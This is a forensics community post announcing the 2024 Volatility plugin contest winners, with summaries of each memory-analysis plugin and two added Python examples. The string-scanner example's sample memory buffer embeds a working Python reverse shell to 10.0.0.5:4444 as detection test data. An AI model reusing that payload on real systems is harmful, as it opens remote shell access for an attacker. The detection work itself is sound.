Results from the 12th Annual Volatility Plugin Contest are in! We received 6 submissions, from 6 different countries, that included 7 plugins, a Linux profile generation tool, and 9 supporting utilities including an exciting submission from last year’s winner!!
Contest submissions included a range of features and functionality:
- Capability to generate Volatility 3 profiles from BPF Type Format (BTF)
- Plugins to extract semantically validated strings
- Novel techniques for extracting memory resident artifacts and detecting advanced malware capabilities
We would like to thank all participants for their hard work on their submissions and contributions to the Volatility community! Independent open-source projects and communities only remain viable because of contributors who are willing to sacrifice their time and resources. Please show your appreciation for the contestants' contributions by following them on GitHub and social media, providing feedback on their ideas, and helping to improve their code with testing, documentation, or contributing patches.
ACKNOWLEDGEMENTS
We would like to thank Volexity for being a sustaining sponsor of the Volatility Foundation and for contributing to this year’s contest. We would also like to thank the core Volatility developers and the previous winners of the contest who helped review and deliberate the submissions.
Placements and Prizes for the 2024 Volatility Plugin Contest
1st place and $3000 USD cash or One Free Seat at Malware and Memory Forensics Training by the Volatility Team goes to:
Valentin Obst: btf2json
2nd place and $2000 USD cash goes to:
Sylvain Peyrefitte: scrings Plugins
3rd place (tie) and $1000 USD cash goes to:
Kartik N. Iyer and Parag H. Rughani: Thread Local Storage (TLS) Callback Plugin
Shusei Tomonaga: ETW Scanner for Volatility 3
Summary of Submissions
Below is a detailed summary of all submissions, ordered alphabetically by first name. If you have feedback for the participants, we’re sure they’d love to hear your thoughts! As previously mentioned, these developers deserve praise for their amazing work. We look forward to seeing future work by these authors!
Kartik N. Iyer and Parag H. Rughani: Thread Local Storage (TLS) Callback Plugin
TlsCheck is “a specialized plugin designed to detect, analyze and disassemble TLS (Thread Local Storage) callbacks in memory samples. The plugin offers features such as regex-based instruction matching, suspicious instruction detection, YARA-rule signature matching and customizable disassembly options, making it a powerful tool for detecting suspicious behaviors in malware and advanced threats.” The submission also includes a detailed white paper.
Related References:
https://github.com/KartikIyerr/TlsCheck.git
https://attack.mitre.org/techniques/T1055/005/
Rosario Matteo Grammatico: Windows Defender Tampering Plugin
The Windows Defender Tampering plugin aims to help investigators identify a defense evasion technique that involves disabling or removing features of Microsoft Windows Defender. The plugin provides quick access to the current values in the Windows Defender Registry key and its subkeys to help identify values that have been modified.
Related References:
https://github.com/Gasu16/Volatility3-tampering-plugin
https://attack.mitre.org/techniques/T1562/001/
https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components
https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/
Shusei Tomonaga: ETW Scanner for Volatility 3
ETW Scan is an open-source Volatility plugin designed to aid security researchers, reverse engineers, and incident responders in leveraging Event Tracing for Windows (ETW) data for enhanced threat hunting and analysis. Built as an investigative tool, ETW Scan extracts and analyzes ETW data still resident in memory to uncover malicious activity, focusing on Windows kernel and user-space events. It serves as an invaluable resource for uncovering suspicious activity, particularly in post-compromise situations.
Related References:
https://github.com/JPCERTCC/etw-scan
https://blogs.jpcert.or.jp/en/2024/11/etw_forensics.html
https://github.com/JPCERTCC/etw-scan/blob/main/docs/Event_Tracing_for_Windows_Internals.pdf
https://www.youtube.com/watch?v=l4-CqWWZOxw
https://www.youtube.com/watch?v=IxFSBWS2wkY
Sylvain Peyrefitte: scrings Plugins
This submission provides two Volatility plugins, ScringsScan and VadScringsScan, for syntax-aware scanning for six different languages in kernel memory on Linux, macOS, and Windows, as well as in process VADs on Windows. Instead of relying on byte-based patterns, the plugins attempt to construct valid syntax trees across scanned memory and report when they detect something that appears to be a valid script in the given language. This makes searching for in-memory script payloads easier than sifting through raw strings output with tools like grep, and significantly improves the signal-to-noise ratio.
Related References:
https://github.com/airbus-cert/scrings/tree/main/volatility
https://tree-sitter.github.io/tree-sitter/
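As an added illustration of the syntax-tree approach (this is example code written for this write-up, not part of scrings, which uses tree-sitter grammars for several languages), the script below scans a constructed byte buffer for Python source using the standard-library `ast` parser. It tries to parse each printable run and, when the whole run is not valid code, the widest window of consecutive lines that is, so a script sandwiched between unrelated text is still found; bare names and string literals also parse, so hits are scored by the number of calls, imports, definitions and assignments in the tree. The sample buffer, its reverse-shell payload and the 32-byte minimum run length are constructed for the example.

```python
"""Added example (not the scrings code): a syntax-aware scan for Python source
in a memory buffer, using the standard-library parser instead of tree-sitter."""
import ast
import re

# Runs of printable ASCII long enough to hold a script; shorter runs are ignored.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e\t\r\n]{32,}")
# Node types that make a parse "interesting": bare names and literals parse too,
# so the score separates real code from text that merely happens to be valid.
SCORED_NODES = (ast.Call, ast.Import, ast.ImportFrom, ast.FunctionDef, ast.Assign)


def _parse(text):
    try:
        return ast.parse(text)
    except (SyntaxError, ValueError):
        return None


def best_python_window(text, min_statements=2):
    """Widest block of consecutive lines in `text` that parses as Python with at
    least `min_statements` top-level statements. A script embedded in junk is
    found by trying narrower windows (tree-sitter recovers from errors instead;
    this brute force is fine for runs of a few dozen lines).
    Returns (first_line, end_line, tree) or None."""
    lines = text.split("\n")
    n = len(lines)
    for width in range(n, 0, -1):
        for start in range(0, n - width + 1):
            tree = _parse("\n".join(lines[start:start + width]))
            if tree is not None and len(tree.body) >= min_statements:
                return start, start + width, tree
    return None


def scan_for_python(buf):
    """Return one hit per printable run that contains a plausible Python script."""
    hits = []
    for m in PRINTABLE_RUN.finditer(buf):
        text = m.group().decode("ascii")
        found = best_python_window(text)
        if found is None:
            continue
        first, end, tree = found
        lines = text.split("\n")
        offset = m.start() + sum(len(l) + 1 for l in lines[:first])  # ASCII: bytes == chars
        hits.append({
            "offset": offset,
            "score": sum(isinstance(node, SCORED_NODES) for node in ast.walk(tree)),
            "script": "\n".join(lines[first:end]),
        })
    return hits


# Constructed sample "memory": zeros, an HTTP request, a log line, some filler
# bytes, then a reverse-shell script preceded by junk on the same printable run.
SAMPLE_MEMORY = (
    b"\x00" * 64
    + b"GET /index.html HTTP/1.1\nHost: example.internal\nUser-Agent: curl/8.0\n\n"
    + b"\x00\x90" * 20
    + b"log: worker 3 started at 12:00:01 with 4 threads, queue depth 17, retrying"
    + b"\x00" * 16
    + b"junk junk junk\n"
    + b"import socket, subprocess\n"
    + b"s = socket.socket()\n"
    + b"s.connect(('10.0.0.5', 4444))\n"
    + b"subprocess.call(['/bin/sh', '-i'], stdin=s.fileno(), stdout=s.fileno())\n"
    + b"\x00" * 32
)

if __name__ == "__main__":
    for hit in scan_for_python(SAMPLE_MEMORY):
        print(f"0x{hit['offset']:x} score={hit['score']}\n{hit['script']}")
```

The HTTP request and the log line are printable but never parse as two or more statements, so they produce no hit, while the script is reported at the byte offset of its first real line even though the run starts with junk; the `min_statements` floor is what stops a lone header such as `Host: example.internal` (a valid annotated assignment) from being reported.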
Thomas Clarke: Image Extraction, NSRL Filtering, and Image Classifiers
This submission has a number of components intended to help an investigator extract memory-resident images and sort those images using numerous classifiers. For example, it includes utilities for automatically extracting process memory dumps and carving the output with foremost. Another component of the submission modifies the Volatility 3 dumpfiles plugin to check whether the extracted files are found in the National Software Reference Library (NSRL). Finally, the submission includes classifiers for data extracted by the aforementioned utilities or for files extracted from disk images. These sort files that contain images, assign a confidence score that a file contains Not Suitable for Work (NSFW) material using the Yahoo open_nsfw classifier, separate files found in the NSRL, estimate the age and gender of faces found in images, and detect whether an image contains nudity.
Related References:
https://github.com/TDClarke/VOLForemost
https://github.com/TDClarke/VOL3NSRL
https://github.com/TDClarke/saForensics
https://talhassner.github.io/home/publication/2015_CVPR
https://github.com/yahoo/open_nsfw
https://www.nist.gov/itl/ssd/software-quality-group/national-software-reference-library-nsrl/nsrl-download/current-rds
Valentin Obst: btf2json
The btf2json project is a very promising effort to ease the burden of large-scale Linux memory analysis. By using the BPF Type Format (BTF) information already present in the readily available vmlinuz file, analysts can create Volatility 3 symbol tables without the need for a full debug kernel. Through acquisition techniques that incorporate filesystem data, it appears that the final version of this project will enable analysis with only information stored within the memory sample, a large shift from the current, laborious process of gathering this information across Linux systems and distributions.
Related References:
https://github.com/vobst/btf2json
https://blog.eb9f.de/2024/11/10/btf2json.html
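To make the mechanism concrete, here is an added example written for this post (it is not btf2json's code and does not reproduce its implementation). It hand-encodes a small constructed BTF blob describing a kernel-style `struct demo_task`, walks the BTF header, type section and string section, and emits the member offsets in the Volatility 3 ISF JSON layout (base_types, and user_types with per-field offset and type descriptors, in the shape dwarf2json produces). The struct, its x86_64 layout and the metadata block are assumptions made for the example; bitfields, enums and symbol addresses are deliberately left out.

```python
"""Added example, not btf2json's code: parse a BTF blob into Volatility 3 ISF JSON."""
import json
import struct

BTF_MAGIC = 0xEB9F
# btf_type kinds this example translates (numbering from include/uapi/linux/btf.h)
K_INT, K_PTR, K_ARRAY, K_STRUCT, K_UNION, K_TYPEDEF = 1, 2, 3, 4, 5, 8
K_VOLATILE, K_CONST, K_RESTRICT, K_FUNC, K_TYPE_TAG = 9, 10, 11, 12, 18
# Kinds only stepped over: (fixed u32 words, u32 words per vlen entry) after the
# 12-byte btf_type header, for enum, func_proto, var, datasec, decl_tag, enum64.
SKIP_WORDS = {6: (0, 2), 13: (0, 2), 14: (1, 0), 15: (0, 3), 17: (1, 0), 19: (0, 3)}

def parse_btf(blob):
    """Return a list indexed by BTF type id; id 0 is the implicit void."""
    magic, _v, _f, hdr_len, type_off, type_len, str_off, str_len = struct.unpack_from("<HBBIIIII", blob, 0)
    if magic != BTF_MAGIC:
        raise ValueError("not a little-endian BTF blob")
    traw = blob[hdr_len + type_off:hdr_len + type_off + type_len]
    strs = blob[hdr_len + str_off:hdr_len + str_off + str_len]
    def name_at(off):
        return strs[off:strs.index(b"\0", off)].decode()
    types, pos = [{"kind": 0, "name": "void"}], 0
    while pos + 12 <= len(traw):
        name_off, info, size_or_type = struct.unpack_from("<III", traw, pos); pos += 12
        kind, vlen, kind_flag = (info >> 24) & 0x1F, info & 0xFFFF, info >> 31
        t = {"kind": kind, "name": name_at(name_off)}
        if kind == K_INT:                   # extra word: encoding flags / bit offset / nr_bits
            (enc,) = struct.unpack_from("<I", traw, pos); pos += 4
            t.update(size=size_or_type, signed=bool((enc >> 24) & 1))
        elif kind == K_ARRAY:               # btf_array: element type, index type, nelems
            elem, _idx, nelems = struct.unpack_from("<III", traw, pos); pos += 12
            t.update(type=elem, nelems=nelems)
        elif kind in (K_STRUCT, K_UNION):   # vlen x btf_member; member offsets are in bits
            members = []
            for _ in range(vlen):
                m_name, m_type, m_off = struct.unpack_from("<III", traw, pos); pos += 12
                # with kind_flag set, the top byte of m_off holds the bitfield size
                members.append((name_at(m_name), m_type, m_off & 0xFFFFFF if kind_flag else m_off))
            t.update(size=size_or_type, members=members)
        elif kind in (K_PTR, K_TYPEDEF, K_VOLATILE, K_CONST, K_RESTRICT, K_FUNC, K_TYPE_TAG):
            t["type"] = size_or_type        # these only reference another type id
        else:
            fixed, per = SKIP_WORDS.get(kind, (0, 0))
            pos += 4 * (fixed + per * vlen)
        types.append(t)
    return types

def isf_type(types, tid):
    """BTF type id -> the ISF type descriptor used in a struct field's "type"."""
    t, k = types[tid], types[tid]["kind"]
    if k in (0, K_INT):
        return {"kind": "base", "name": t["name"]}
    if k == K_PTR:
        return {"kind": "pointer", "subtype": isf_type(types, t["type"])}
    if k == K_ARRAY:
        return {"kind": "array", "count": t["nelems"], "subtype": isf_type(types, t["type"])}
    if k in (K_STRUCT, K_UNION):
        return {"kind": "struct" if k == K_STRUCT else "union", "name": t["name"]}
    return isf_type(types, t["type"])       # typedef/const/volatile/restrict keep the layout

def btf_to_isf(blob, pointer_size=8):
    """ISF subset needed for struct layouts; bitfields and anonymous members are skipped."""
    types = parse_btf(blob)
    base = {"void": {"size": 0, "signed": False, "kind": "void", "endian": "little"},
            "pointer": {"size": pointer_size, "signed": False, "kind": "int", "endian": "little"}}
    user = {}
    for t in types[1:]:
        if t["kind"] == K_INT:
            base[t["name"]] = {"size": t["size"], "signed": t["signed"],
                               "kind": "char" if t["size"] == 1 else "int", "endian": "little"}
        elif t["kind"] in (K_STRUCT, K_UNION) and t["name"]:
            fields = {m: {"offset": bits // 8, "type": isf_type(types, tid)}
                      for m, tid, bits in t["members"] if m and bits % 8 == 0}
            user[t["name"]] = {"size": t["size"], "fields": fields,
                               "kind": "struct" if t["kind"] == K_STRUCT else "union"}
    # BTF carries no symbol addresses, so "symbols" stays empty here (assumed metadata).
    return {"metadata": {"format": "6.2.0", "producer": {"name": "btf-isf-example", "version": "0"}},
            "base_types": base, "user_types": user, "enums": {}, "symbols": {}}

def build_demo_btf():
    """Constructed sample: BTF for `struct demo_task {int pid; unsigned long flags; struct demo_task *next; char comm[16];}`, size 40."""
    strs = bytearray(b"\0")                 # string offset 0 is always ""
    def s(text):
        off = len(strs); strs.extend(text.encode() + b"\0"); return off
    def ty(name_off, kind, vlen, size_or_type, *extra):
        return struct.pack("<III", name_off, (kind << 24) | vlen, size_or_type) + struct.pack(f"<{len(extra)}I", *extra)
    types = b"".join([
        ty(s("int"), K_INT, 0, 4, (1 << 24) | 32),              # id 1: signed, 32 bits
        ty(s("char"), K_INT, 0, 1, (1 << 24) | 8),              # id 2
        ty(s("unsigned long"), K_INT, 0, 8, 64),                # id 3: unsigned, 64 bits
        ty(0, K_PTR, 0, 5),                                     # id 4: pointer to id 5
        ty(s("demo_task"), K_STRUCT, 4, 40,                     # id 5: four members
           s("pid"), 1, 0, s("flags"), 3, 64, s("next"), 4, 128, s("comm"), 6, 192),
        ty(0, K_ARRAY, 0, 0, 2, 3, 16),                         # id 6: char[16], index type id 3
    ])
    hdr = struct.pack("<HBBIIIII", BTF_MAGIC, 1, 0, 24, 0, len(types), len(types), len(strs))
    return hdr + types + bytes(strs)

if __name__ == "__main__":
    print(json.dumps(btf_to_isf(build_demo_btf()), indent=2))
```

On a running system the same bytes are exposed at /sys/kernel/btf/vmlinux, and a kernel image carries them in its .BTF section, which is why no debug kernel is needed for the type side. BTF describes types only: the empty symbols map has to be filled from another source (the kernel's symbol table, for instance) before Volatility 3 can locate anything in the sample, and a real converter also has to emit the kernel banner that Volatility uses to match a table to an image.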
Resources
Here are some additional resources for previous contests and community-driven plugins:
- Volatility Foundation Contest Page: https://volatilityfoundation.org/contest
- Volatility 3 Community GitHub Repository: https://github.com/volatilityfoundation/community3